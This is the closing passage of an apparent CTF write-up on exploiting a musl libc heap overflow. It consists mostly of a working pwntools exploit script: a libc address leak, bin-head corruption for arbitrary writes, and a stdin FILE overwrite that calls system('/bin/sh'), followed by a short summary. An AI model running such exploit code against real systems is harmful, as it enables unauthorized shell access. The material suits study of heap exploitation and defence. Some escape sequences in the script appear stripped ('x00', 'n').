p.sendafter("Say hello to your new sleeve >", ctx)
def free(idx):
p.sendlineafter(">", '2')
p.sendlineafter("What is your sleeve ID? >", str(idx))
def edit(idx, ctx):
p.sendlineafter(">", '3')
p.sendlineafter("What is your sleeve ID? >", str(idx))
p.send(ctx)
def view(idx):
p.sendlineafter(">", '4')
p.sendlineafter("What is your sleeve ID? >", str(idx))
return p.recvuntil("Done.", True)
alloc(0x1, 'A') #0
libc_base = u64(view(0).ljust(8, 'x00')) - 0x292e41
info("libc base: 0x%x", libc_base)
stdin = libc_base + 0x292200
binmap = libc_base + 0x292ac0
brk = libc_base + 0x295050
bin = libc_base + 0x292e40
system = libc_base + 0x42688
# 1. construct fake chunks
alloc(0x10) #1
alloc(0x10) #2, prevent consolidation
alloc(0x10) #3
alloc(0x10) #4, prevent consolidation
alloc(0x10) #5
alloc(0x10) #6, prevent consolidation
alloc(0x10) #7
alloc(0x10) #8, prevent consolidation
free(1)
free(3)
payload = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(stdin - 0x10) * 2
payload += p8(0x20)
payload += 'n'
alloc(0x10, payload, 'Y') #1
alloc(0x10) #3
free(1) # set as non-empty bin
edit(3, p64(binmap - 0x20) * 2)
alloc(0x10) #1
free(5) # set as non-empty bin
edit(3, p64(brk - 0x10) * 2)
alloc(0x10) #5
free(7) # set as non-empty bin
# 2. corrupt bin head and get arbitrary pointers
edit(3, p64(bin - 0x10) + p64(stdin - 0x10))
alloc(0x10) #7
alloc(0x50) #9
edit(3, p64(bin - 0x10) + p64(brk - 0x10))
alloc(0x10) #10
alloc(0x50) #11
edit(3, p64(bin - 0x10) + p64(binmap - 0x20))
alloc(0x10) #12
alloc(0x50) #13
# 3. corrupt stdin, binmap and brk
payload = "/bin/shx00" # stdin->flags
payload += 'X' * 0x20
payload += p64(0xdeadbeef) # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead) # stdin->wbase
payload += 'X' * 8
payload += p64(system) # stdin->write
edit(9, payload) # stdin
edit(11, p64(0xbadbeef - 0x20) + 'n') # brk
edit(13, 'X' * 0x10 + p64(0) + 'n') # binmap
# 4. get shell
p.sendlineafter(">", '1')
p.sendlineafter("What is your prefer size? >", '0')
p.interactive()
5. Summary
This article shows how to use the heap overflow vulnerability to hijack the header of the bin linked list in the musl libc environment, modify the linked list pointer through unbin to achieve arbitrary address writing, and finally get the shell through FSOP. In addition, it also introduces the general implementation of the musl libc heap manager, the method of malloc returning any heap address, the error of the question, and the repair method.